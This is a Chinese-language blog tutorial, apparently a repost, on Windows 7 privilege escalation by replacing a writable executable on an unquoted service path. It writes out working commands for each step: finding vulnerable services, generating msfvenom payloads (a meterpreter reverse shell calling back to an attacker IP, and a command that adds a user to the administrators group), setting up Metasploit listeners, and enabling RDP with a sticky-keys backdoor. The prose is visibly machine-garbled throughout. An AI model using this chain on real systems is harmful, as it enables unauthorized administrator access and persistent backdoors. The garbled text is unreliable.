Windows平台下实现提权的新姿势

在这篇文章中,我们将给大年夜家演示若何经由过程无引号办事路径来实现在Windows平台下的提权。在渗透测试的历程中,当我们以本地用户身份天生敕令Shell时,我们是无法反省受限文件或目录的,是以我们才必要拿到治理员造访权。

无引号办事路径破绽

这个破绽跟可履行文件的路径有关,假如文件名中存在空格,或者文件路径没有包裹在双引号之中,那进击者就可以用恶意exe文件调换掉落蓝本合法的exe文件,并实现提权。

情况搭建

目标主机:Windows 7

进击主机:Kali Linux

首先,我们必要在目标Windows系统中下载并安装一个名叫photodex proshow的包孕破绽的利用法度榜样,下载镜像可以在Exploit DB上找到。

天生目标主机

为了拿到meterpreter会话,我们至少要成功入侵目标Windows设备一次,你可以从下图中看到,我们已经拿到了目标主机的meterpreter会话了。现在,打开敕令Shell:

shell

你可以看到,我们拿到的shell造访权是本地用户local_user,为了拿到cmd的治理员权限,我们就必要提权。首先,我们可以罗列出目标主机上正在运行的所有办事,并找出那些没有被双引号包裹的办事路径,这一步可以用下列敕令实现:

wmic service get name,displayname,pathname,startmode |findstr /i “auto”|findstr /i /v “c:\windows\\” |findstr /i /v “””

这里,我们罗列出了下列路径:

C:\ProgramFiles\Photodex\ProShow Producer\Scsiaccess.exe

这个路径没有被双引号包裹,而且文件名中也存在空格。

现在,我们必要应用下列敕令识别文件目录权限:

icacls Scsiaccess.exe

你可以看到,它给任何人都供给了写入权限,这也就意味着任何用户都可以重写该文件:

经由过程进程迁移实现提权

现在,我们只必要把恶意exe放在同一文件夹内,它就自动拥有治理员权限了,当办事重启之后,Windows将启动这个恶意exe。

在Kali Linux中打开终端,然后经由过程下列敕令应用msfvenom天生恶意exe Payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234prependmigrate=true prepenmigrateprocess=explorer.exe -f exe >/root/Desktop/scsiaccess.exe

上面的敕令将在桌面天生一个恶意exe文件,然后将该文件发送给目标主机。Payload会考试测验迁移恶意进程,假如用户经由过程进程ID终止了当提高程的运行,进击者也不会损掉会话和Payload的节制权。

现在,用恶意exe调换掉落合法的可履行文件,这里我把合法Scsiaccess.exe重命名为了Scsiaccess.exe.orginal,并将恶意Scsiaccess.exe上传到了同一文件夹内,然后重启目标主机:

movescsiaccess.exe scsiaccess.exe.orginal

upload/root/Desktop/ scsiaccess.exe

reboot:

与此同时,我在新的终端里开启了多个handler监听器来捕捉meterpreter会话:

use exploit/multi/handler

msf exploit(multi/handler) set payload windows /meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.107

msf exploit(multi/handler) set lport 1234

msf exploit(multi/handler) exploit

一段光阴之后,我们就能够拿到拥有治理员权限的shell了:

经由过程添加治理员组用户来实现提权

应用local_user权限天生了shell之后,我们就可以在没有治理员权限的环境下罗列完备的用户名列表了。这里我们发明,用户raaz不是治理员组的成员:

net user

net user raaz

同样的,我们天生了一个exe文件,并用它来将用户raaz添加到了治理员组中,我们天生的恶意exe文件名照样叫Scsiaccess.exe:

msfvenom -p windows/exec CMD=’net localgroup administrators raaz /add’ -f exe >/root/Desktop/scsiaccess.exe

[1] [2]下一页

重复上述步骤,用恶意exe文件调换掉落同一目录下的合法exe,然后重启目标主机:

仔细看下面的截图,你就会发明用户raaz已经成为了治理员组成员了:

经由过程RDP&Sticky_key实现提权

应用msfvenom天生一个相同文件名(Scsiaccess.exe)的exe文件,然后将其发送至目标主机,同时使用自动运行脚本开启多个监听器,这样将会启用RDP办事:

use exploit/multi/handler

msf exploit(multi/handler) set payload windows /meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.107

msf exploit(multi/handler) set lport 1234

msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdp

msf exploit(multi/handler) exploit

类似的,当目标办事重启之后,我们可以设置自动运行脚原先启用sticky_keys:

msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keys

msf exploit(multi/handler) run

你可以从下图中看到,敕令开启了另一个meterpreter会话(session 3),这个会话拥有治理员权限,现在我们就可以经由过程RDP与目标主机建立连接了:

rdp 192.168.1.101

接下来,继续按下5次shift键,你将会拿到拥有治理员权限的敕令行窗口:

没错,便是这么简单!

上一页[1] [2]

赞(0) 打赏
分享到: 更多 (0)
免责申明:本站所有资料均来自于网络,版权归原创者所有!本站不提供任何保证,不保证真实性,并不承担任何法律责任

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

阿里云优惠网 更专业 更优惠

阿里云优惠券阿里云大礼包